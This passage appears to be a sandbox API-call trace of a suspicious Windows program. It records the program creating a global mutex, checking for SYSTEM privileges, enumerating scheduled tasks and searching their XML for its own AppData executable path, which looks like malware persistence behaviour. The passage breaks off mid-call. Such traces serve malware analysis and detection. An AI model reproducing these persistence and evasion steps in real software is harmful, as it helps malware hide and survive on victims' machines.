[0137.486] GetWindowsDirectoryW (in: lpBuffer=0x24e2b0, uSize=0x208 | out: lpBuffer="C:\\Windows") returned 0xa [0137.486] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x24e4d8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x24e4d8*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0137.487] CreateMutexW (lpMutexAttributes=0x24e4f0, bInitialOwner=1, lpName="Global\\E0B7509842610") returned 0xfc [0137.487] LocalFree (hMem=0x433460) returned 0x0 [0137.487] GetLastError () returned 0x0 [0137.487] GetCurrentProcess () returned 0xffffffffffffffff [0137.487] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x24e608 | out: TokenHandle=0x24e608*=0x104) returned 1 [0137.487] GetTokenInformation (in: TokenHandle=0x104, TokenInformationClass=0x1, TokenInformation=0x24e570, TokenInformationLength=0x54, ReturnLength=0x24e5f0 | out: TokenInformation=0x24e570, ReturnLength=0x24e5f0) returned 1 [0137.487] AllocateAndInitializeSid (in: pIdentifierAuthority=0x24e5f8, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x24e600 | out: pSid=0x24e600*=0x442950*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0137.487] EqualSid (pSid1=0x24e580*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68)), pSid2=0x442950*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0 [0137.487] CloseHandle (hObject=0x104) returned 1 [0137.487] GetVersion () returned 0x1db10106 [0137.487] CoCreateInstance (in: rclsid=0x1001b3c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1001cc70*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x1001cc68 | out: ppv=0x1001cc68*=0x126890) returned 0x0 [0137.622] TaskScheduler:ITaskService:Connect (This=0x126890, serverName=0x24e1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x24e2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x24e1e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x24e220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0137.627] TaskScheduler:ITaskService:GetFolder (in: This=0x126890, Path=0x0, ppFolder=0x24e600 | out: ppFolder=0x24e600*=0x125a50) returned 0x0 [0137.630] ITaskFolder:GetTasks (in: This=0x125a50, flags=1, ppTasks=0x24df20 | out: ppTasks=0x24df20*=0x126a50) returned 0x0 [0137.645] IRegisteredTaskCollection:get_Count (in: This=0x126a50, pCount=0x24e080 | out: pCount=0x24e080*=4) returned 0x0 [0137.645] IRegisteredTaskCollection:get_Item (in: This=0x126a50, index=0x24df60*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0xfffffffffffffffe), ppRegisteredTask=0x24df10 | out: ppRegisteredTask=0x24df10*=0x126b10) returned 0x0 [0137.646] IRegisteredTask:get_Name (in: This=0x126b10, pName=0x24df30 | out: pName=0x24df30*="Adobe Flash Player Updater") returned 0x0 [0137.646] IRegisteredTask:get_Xml (in: This=0x126b10, pXml=0x24df18 | out: pXml=0x24df18*="\r\n\r\n \r\n Adobe Systems Incorporated\r\n This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.\r\n \r\n \r\n \r\n true\r\n \r\n PT3600S\r\n PT86400S\r\n false\r\n \r\n 2000-01-01T00:59:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n PT259200S\r\n false\r\n false\r\n false\r\n true\r\n false\r\n 9\r\n \r\n PT600S\r\n PT3600S\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n System\r\n InteractiveTokenOrPassword\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashPlayerUpdateService.exe\r\n \r\n \r\n") returned 0x0 [0137.673] StrStrIW (lpFirst="\r\n\r\n \r\n Adobe Systems Incorporated\r\n This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.\r\n \r\n \r\n \r\n true\r\n \r\n PT3600S\r\n PT86400S\r\n false\r\n \r\n 2000-01-01T00:59:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n PT259200S\r\n false\r\n false\r\n false\r\n true\r\n false\r\n 9\r\n \r\n PT600S\r\n PT3600S\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n System\r\n InteractiveTokenOrPassword\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashPlayerUpdateService.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.675] IUnknown:Release (This=0x126b10) returned 0x0 [0137.675] IRegisteredTaskCollection:get_Item (in: This=0x126a50, index=0x24df60*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000002, varVal2=0xfffffffffffffffe), ppRegisteredTask=0x24df10 | out: ppRegisteredTask=0x24df10*=0x126b10) returned 0x0 [0137.675] IRegisteredTask:get_Name (in: This=0x126b10, pName=0x24df30 | out: pName=0x24df30*="GoogleUpdateTaskMachineCore") returned 0x0 [0137.676] IRegisteredTask:get_Xml (in: This=0x126b10, pXml=0x24df18 | out: pXml=0x24df18*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0 [0137.679] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", 